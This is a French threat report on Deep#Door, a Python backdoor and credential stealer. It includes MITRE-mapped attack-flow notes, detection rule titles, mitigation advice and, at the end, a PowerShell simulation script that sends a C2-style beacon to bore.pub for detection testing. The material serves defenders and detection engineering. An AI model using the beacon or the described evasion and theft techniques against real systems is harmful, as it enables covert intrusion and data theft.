Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport examine Deep#Door, une porte dérobée furtive basée sur Python, livrée via un chargeur de lot obscurci qui intègre et reconstruit sa charge utile malveillante à l’exécution. Le malware utilise un service de tunneling TCP public pour le commandement et le contrôle, configure plusieurs mécanismes de persistance, affaiblit les contrôles de sécurité de Windows, et prend en charge une large surveillance et une activité de vol d’identifiants. Il effectue également des vérifications détaillées de l’environnement pour échapper aux bacs à sable et aux analystes, tout en s’appuyant sur le colmatage en mémoire des API pour rester dissimulé pendant l’exécution.
Enquête
Les chercheurs de Securonix ont cartographié toute la chaîne d’infection, du script de lot initial à l’extraction, la reconstruction et l’exécution de la charge utile finale du RAT Python. Leur analyse a identifié un abus de bore.pub pour le tunneling, les ports générés dynamiquement et une séquence d’authentification personnalisée utilisée pour l’accès des opérateurs. Le rapport détaillait également les méthodes d’évasion de défense du malware, les techniques de persistance, les routines de découverte de système et le comportement d’exfiltration de données.
Atténuation
Les défenseurs devraient surveiller de près l’exécution des scripts, activer la journalisation de PowerShell, détecter les modifications non autorisées des paramètres de Microsoft Defender et du pare-feu, et auditer les entrées de démarrage, les clés Run et les emplacements de persistance connexes. La surveillance du réseau devrait également se concentrer sur les connexions sortantes vers bore.pub et une activité de port élevé inhabituelle. Les outils EDR capables de détecter le colmatage des API et la manipulation en mémoire peuvent améliorer davantage la visibilité de cette menace.
Réponse
Si une activité de Deep#Door est détectée, isolez immédiatement le point de terminaison affecté, terminez le processus Python malveillant, supprimez tous les mécanismes de persistance, y compris les scripts de démarrage, les clés Run et les abonnements WMI, et restaurez les paramètres modifiés de Defender et de journalisation. Les équipes de sécurité devraient également effectuer une analyse de la mémoire et une analyse judiciaire pour identifier les implants cachés et évaluer l’exposition au vol d’identifiants, tout en bloquant la communication réseau avec bore.pub.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes Definitions action_user_execution["<b>Action</b> – <b>T1204 User Execution</b>: Victime exécute un fichier batch malveillant install_obf.bat"] class action_user_execution action tool_batch_file["<b>Outil</b> – <b>Nom</b>: install_obf.bat<br/><b>Description</b>: Script batch qui lance le chargeur"] class tool_batch_file tool action_obfuscation["<b>Action</b> – <b>T1027 Fichiers ou Informations Obscurcis</b>: Extrait une charge utile Python encodée en base64/XOR (svc.py) via une regex auto-référente PowerShell"] class action_obfuscation action tool_powershell["<b>Outil</b> – <b>Nom</b>: PowerShell<br/><b>Description</b>: Utilisé pour analyser le fichier batch et décoder la charge utile intégrée"] class tool_powershell tool tool_python["<b>Outil</b> – <b>Nom</b>: Python<br/><b>Description</b>: Exécute la charge utile svc.py décodée"] class tool_python tool action_defense_evasion_disable["<b>Action</b> – <b>T1562.001 Désactiver ou Modifier des Outils</b> / <b>T1562.004 Désactiver ou Modifier le Pare-feu Système</b> / <b>T1562.008 Désactiver ou Modifier les Journaux Cloud</b>: Désactive Windows Defender, la journalisation PowerShell, SmartScreen et la journalisation du pare-feu"] class action_defense_evasion_disable action tool_setmp["<b>Outil</b> – <b>Nom</b>: Set-MpPreference<br/><b>Description</b>: Cmdlet PowerShell pour modifier les paramètres de Defender"] class tool_setmp tool tool_netsh["<b>Outil</b> – <b>Nom</b>: netsh advfirewall<br/><b>Description</b>: Modifie les règles du pare-feu Windows et la journalisation"] class tool_netsh tool action_indicator_removal["<b>Action</b> – <b>T1070.001 Effacer les Journaux d’Événements Windows</b> et <b>T1070.006 Timestomp</b>: Arrête et efface les services EventLog/Sysmon et altère les horodatages des fichiers"] class action_indicator_removal action action_persistence_runkey["<b>Action</b> – <b>T1547.001 Clés de Démarrage/Folder</b> du Registre et <b>T1053 Tâche/Job Planifié</b>: Dépose SystemServices.vbs dans le dossier de démarrage, crée une clé Run et une tâche planifiée en tant que solution de repli"] class action_persistence_runkey action tool_vbs_startup["<b>Outil</b> – <b>Nom</b>: SystemServices.vbs<br/><b>Description</b>: Script VBS placé dans %APPDATA%MicrosoftWindowsStart MenuProgramsStartup"] class tool_vbs_startup tool action_credential_access["<b>Action</b> – <b>T1003 Vidage des Identifiants OS</b>, <b>T1552.004 Clés Privées</b>, <b>T1552.001 Identifiants dans les Fichiers</b>, <b>T1555 Magasins de Mots de Passe</b>, <b>T1555.005 Gestionnaires de Mots de Passe</b>: Récolte des mots de passe navigateurs, Windows Credential Manager, clés SSH, jetons cloud"] class action_credential_access action action_collection["<b>Action</b> – <b>T1056.001 Keylogging</b>, <b>T1113 Capture d’Écran</b>, <b>T1125 Capture Vidéo</b>, <b>T1123 Capture Audio</b>, <b>T1115 Données du Presse-papier</b>: Capture des frappes clavier, captures d’écran, vidéos webcam, audio microphone et presse-papier"] class action_collection action action_discovery["<b>Action</b> – <b>T1082 Découverte d’Informations Système</b>, <b>T1518 Découverte de Logiciels</b>, <b>T1057 Découverte de Processus</b>, <b>T1046 Découverte de Services Réseau</b>, <b>T1018 Découverte de Systèmes à Distance</b>, <b>T1526 Découverte de Services Cloud</b>: Rassemble les données de configuration OS, matériel, logiciel, processus, réseau et cloud"] class action_discovery action action_defense_evasion_reflective["<b>Action</b> – <b>T1620 Chargement de Code Réfléchi</b> et <b>T1497.003 Évasion de Virtualisation/Bac à Sable: Basée sur le Temps</b>: Détecte les débogueurs, les machines virtuelles et les caractéristiques de bac à sable et interrompt l’exécution"] class action_defense_evasion_reflective action action_c2_tunneling["<b>Action</b> – <b>T1572 Tunneling de Protocole</b>: Établit un tunnel crypté via le service public bore.pub, effectue un scan de ports dynamique et une authentification défi-réponse"] class action_c2_tunneling action action_exfiltration["<b>Action</b> – <b>T1041 Exfiltration via Canal C2</b> et <b>T1048.002 Exfiltration via Protocole Alternatif: Cryptage Asymétrique Non-C2</b>: Envoie les données récoltées via le canal tunnelisé"] class action_exfiltration action action_impact_forkbomb["<b>Action</b> – <b>T1499.002 Saturation de Service Attaque à la Bombe</b>: Exécute une bombe-fork pour consommer les ressources système"] class action_impact_forkbomb action %% Connexions montrant le flux d’attaque action_user_execution –>|exécute| tool_batch_file tool_batch_file –>|contient| action_obfuscation action_obfuscation –>|utilise| tool_powershell tool_powershell –>|décodage et lance| tool_python tool_python –>|effectue| action_defense_evasion_disable action_defense_evasion_disable –>|utilise| tool_setmp action_defense_evasion_disable –>|utilise| tool_netsh action_defense_evasion_disable –>|conduit à| action_indicator_removal action_indicator_removal –>|précède| action_persistence_runkey action_persistence_runkey –>|dépose| tool_vbs_startup action_persistence_runkey –>|active| action_credential_access action_credential_access –>|active| action_collection action_collection –>|alimente| action_discovery action_discovery –>|soutient| action_defense_evasion_reflective action_defense_evasion_reflective –>|établit| action_c2_tunneling action_c2_tunneling –>|transporte| action_exfiltration action_exfiltration –>|déclenche| action_impact_forkbomb "
Flux d’Attaque
Détections
Points de Persistance Possibles [ASEPs – Hive Logiciel/NTUSER] (via registry_event)
Voir
Chaînes Powershell Suspectes (via cmdline)
Voir
Appelez des Classes/Methodes .NET Suspects de Powershell CommandLine (via process_creation)
Voir
Possible Découverte ou Vérification de Connectivité Système à Distance (via cmdline)
Voir
Possible Énumération/Manipulation de Compte ou Groupe (via cmdline)
Voir
Utilisation Possible de Timeout pour Retarder l’Exécution (via cmdline)
Voir
WScript / CScript LOLBAS (via process_creation)
Voir
Désactiver la Surveillance en Temps Réel de Windows Defender et Autres Changements de Préférences (via cmdline)
Voir
Chaînes Powershell Suspectes (via powershell)
Voir
Modifications Suspectes des Préférences de Windows Defender (via powershell)
Voir
Binaire ou Scripts Suspects dans l’Emplacement de Démarrage Automatique (via file_event)
Voir
IOCs (HashSha256) à détecter : Deep#Door Stealer : Porte dérobée Python furtive et voleur d’identifiants utilisant le tunneling, la persistance multi-couches, et les capacités de surveillance en mémoire
Voir
Détecter la Communication C2 via le Service de Tunneling TCP Public [Connexion Réseau Windows]
Voir
Commande PowerShell pour l’Extraction de Charge Utile Python Intégrée [Windows Powershell]
Voir
Détection du Déploiement de la Porte Dérobée Python Furtive Deep#Door [Création de Processus Windows]
Voir
Détection de l’Utilisation du Service de Tunneling TCP Bore.pub pour les Communications C2 [Connexion Réseau Windows]
Voir
Surveillance en Temps Réel et Comportement de Windows Defender Désactivée [Windows Powershell]
Voir
Exécution de Script Batch Obscurci Deep#Door [Création de Processus Windows]
Voir
Commande PowerShell Désactivant les Fonctions de Windows Defender [Windows Powershell]
Voir
Détection de l’Exécution de la Porte Dérobée Python Furtive Deep#Door [Création de Processus Windows]
Voir
Détection de la Communication C2 Furtive via bore.pub [Connexion Réseau Windows]
Voir
Détection du Stealer Deep#Door Utilisant Powershell et Altération de Pare-feu [Windows Powershell]
Voir
Exécution de Simulation
Prérequis : Le Contrôle Préalable de Télémétrie & Baseline doit avoir réussi.
Raison : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif d’Attaque & Commandes :
Un attaquant ayant acquis un point d’appui à faible privilèges sur l’hôte Windows souhaite établir un canal C2 furtif en utilisant le service de tunneling publiquement connu
bore.pubservice de tunneling utilisé par Deep#Door. Pour se fondre dans le trafic légitime, l’attaquant sélectionne un port de la plage 41,234-41,243 (choisie par le malware) et utilise PowerShellSystem.Net.Sockets.TcpClientclasse pour ouvrir une connexion TCP brute. La connexion est maintenue inactive pendant une courte période pour imiter un signaleur avant de transmettre une petite balise encodée en base-64. -
Script de Test de Régression :
# Simuler la balise C2 de Deep#Door vers bore.pub sur un port aléatoire dans la gamme surveillée $domain = 'bore.pub' $port = Get-Random -Minimum 41234 -Maximum 41244 # La limite supérieure est exclusive try { Write-Host "Connexion à $domain:$port ..." $client = New-Object System.Net.Sockets.TcpClient $client.Connect($domain, $port) $stream = $client.GetStream() # Charge utile de balise minimale (par exemple, un "ping" encodé en base64) $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0') $stream.Write($payload,0,$payload.Length) Write-Host "Balise envoyée. Connexion maintenue pendant 5 secondes..." Start-Sleep -Seconds 5 } catch { Write-Error "Connexion échouée: $_" } finally { if ($stream) { $stream.Close() } if ($client) { $client.Close() } Write-Host "Connexion fermée." } -
Commandes de Nettoyage :
# Aucun artefact persistant ; assurez-vous qu'aucune connexion TCP persistante ne traîne Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force } Write-Host "Nettoyage terminé."
Fin du Rapport